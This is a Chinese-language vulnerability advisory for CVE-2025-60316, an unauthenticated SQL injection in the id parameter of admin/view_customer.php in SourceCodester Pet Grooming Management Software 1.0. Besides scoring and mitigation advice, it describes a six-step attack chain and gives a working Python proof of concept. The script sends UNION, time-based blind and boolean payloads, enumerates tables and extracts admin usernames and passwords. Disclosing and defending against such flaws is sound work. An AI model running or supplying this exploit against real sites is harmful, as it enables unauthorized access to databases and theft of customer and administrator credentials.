CVE-2025-60316：SourceCodester宠物美容管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-60316

漏洞类型

SQL注入

CVSS评分

9.4 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pet Grooming Management Software

漏洞概述

CVE-2025-60316是SourceCodester Pet Grooming Management Software 1.0版本中存在的一个严重SQL注入漏洞。该漏洞位于管理后台的admin/view_customer.php文件中，通过ID参数触发攻击。由于应用程序未对用户输入进行充分的过滤和参数化处理，远程攻击者可以直接通过构造恶意的SQL语句注入到数据库查询中，从而实现未授权的数据访问和数据库操控。

该漏洞的CVSS 3.1评分为9.4分，属于严重级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需任何特权（PR:N），无需用户交互（UI:N）。在影响方面，该漏洞对机密性产生高影响（C:H），对完整性产生高影响（I:H），对可用性产生低影响（A:L）。这意味着攻击者可以读取和修改数据库中的敏感信息，但可能不会直接导致服务完全不可用。

SourceCodester Pet Grooming Management Software是一款用于宠物美容店管理的Web应用程序，包含客户管理、预约管理、服务记录等功能。由于该系统通常存储客户的个人信息和业务数据，SQL注入漏洞可能导致大量敏感数据泄露，包括客户姓名、联系方式、宠物信息等。该漏洞已于2025年10月9日公开披露，并已存在公开的PoC和利用视频，对使用该软件的企业构成严重威胁。

技术细节

该SQL注入漏洞存在于admin/view_customer.php文件的ID参数处理逻辑中。当管理员或用户通过GET或POST请求访问该页面并传递ID参数时，应用程序直接将用户输入拼接到SQL查询语句中，而没有使用预编译语句（Prepared Statements）或参数化查询，也没有进行充分的输入验证和过滤。

攻击者可以通过构造特殊的SQL注入payload来利用此漏洞。例如，通过在ID参数中注入UNION SELECT语句，攻击者可以读取数据库中的任意数据；通过注入UPDATE或INSERT语句的变体，攻击者可以修改数据库内容；通过使用时间盲注（time-based blind injection）技术，攻击者可以在无回显的情况下逐步提取数据库信息。

由于该漏洞无需认证即可利用（PR:N），且攻击复杂度低，远程攻击者只需发送一个精心构造的HTTP请求即可触发漏洞。典型的利用URL格式为：admin/view_customer.php?id=1' OR '1'='1 或包含UNION SELECT的更复杂payload。成功利用后，攻击者可以获取数据库管理员权限，进而完全控制整个数据库系统，包括读取、修改、删除所有数据，甚至可能通过数据库特性执行系统命令。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或Shodan等工具识别运行SourceCodester Pet Grooming Management Software 1.0的目标网站，定位admin/view_customer.php端点。

STEP 2

步骤2：漏洞探测

攻击者向目标URL发送带有特殊字符（如单引号）的请求，检测是否存在SQL注入漏洞。通过观察响应内容或响应时间的变化确认漏洞存在。

STEP 3

步骤3：构造注入Payload

根据数据库类型（通常是MySQL），构造UNION SELECT或基于时间的盲注payload，通过ID参数注入恶意SQL语句。

STEP 4

步骤4：数据提取

利用SQL注入漏洞提取数据库中的敏感信息，包括管理员凭据、客户个人信息、宠物记录等。

STEP 5

步骤5：权限提升与持久化

使用获取的管理员凭据登录系统后台，获取更高权限。攻击者还可以修改数据库内容、植入后门或上传WebShell以维持持久访问。

STEP 6

步骤6：数据破坏或泄露

攻击者可以删除数据库内容、窃取客户数据进行非法交易，或将敏感信息在暗网上出售，对企业和客户造成严重损害。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60316 - SQL Injection PoC
# Target: SourceCodester Pet Grooming Management Software 1.0
# Vulnerable file: admin/view_customer.php
# Vulnerable parameter: id

import requests

TARGET_URL = "http://target-site.com"
VULNERABLE_ENDPOINT = "/admin/view_customer.php"

def exploit_sql_injection(target_url, injection_payload):
    """
    Exploit SQL injection in the 'id' parameter of view_customer.php
    """
    url = f"{target_url}{VULNERABLE_ENDPOINT}"
    params = {"id": injection_payload}
    
    try:
        response = requests.get(url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None

# Test 1: Basic SQL injection detection
payload_basic = "1' OR '1'='1"
print("[*] Testing basic SQL injection...")
response = exploit_sql_injection(TARGET_URL, payload_basic)
if response:
    print(f"[+] Response length: {len(response)}")
    print("[+] Possible SQL injection detected!")

# Test 2: UNION-based injection to extract database version
payload_union = "1' UNION SELECT 1,version(),database(),user(),5,6,7,8,9,10-- -"
print("\n[*] Testing UNION-based injection...")
response = exploit_sql_injection(TARGET_URL, payload_union)
if response:
    print(f"[+] Response:\n{response[:500]}")

# Test 3: Extract table names from information_schema
payload_tables = "1' UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10 FROM information_schema.tables WHERE table_schema=database()-- -"
print("\n[*] Extracting table names...")
response = exploit_sql_injection(TARGET_URL, payload_tables)
if response:
    print(f"[+] Tables:\n{response}")

# Test 4: Time-based blind SQL injection
import time
payload_timebased = "1' AND SLEEP(5)-- -"
print("\n[*] Testing time-based blind injection...")
start_time = time.time()
exploit_sql_injection(TARGET_URL, payload_timebased)
elapsed = time.time() - start_time
if elapsed >= 5:
    print(f"[+] Time-based injection confirmed! Elapsed: {elapsed:.2f}s")

# Test 5: Extract admin credentials
payload_creds = "1' UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10 FROM admin-- -"
print("\n[*] Extracting admin credentials...")
response = exploit_sql_injection(TARGET_URL, payload_creds)
if response:
    print(f"[+] Admin credentials:\n{response}")

print("\n[!] Exploitation complete")

影响范围

SourceCodester Pet Grooming Management Software 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）或服务器配置规则，阻止包含SQL注入特征的请求（如包含UNION、SELECT、SLEEP等关键词的请求）；2）在Web服务器层面限制对admin/view_customer.php文件的直接访问，或要求必须经过认证才能访问；3）对ID参数实施输入验证，仅允许整数类型的输入；4）监控数据库日志，及时发现异常的SQL查询行为；5）考虑暂时禁用该功能模块，直到漏洞被修复。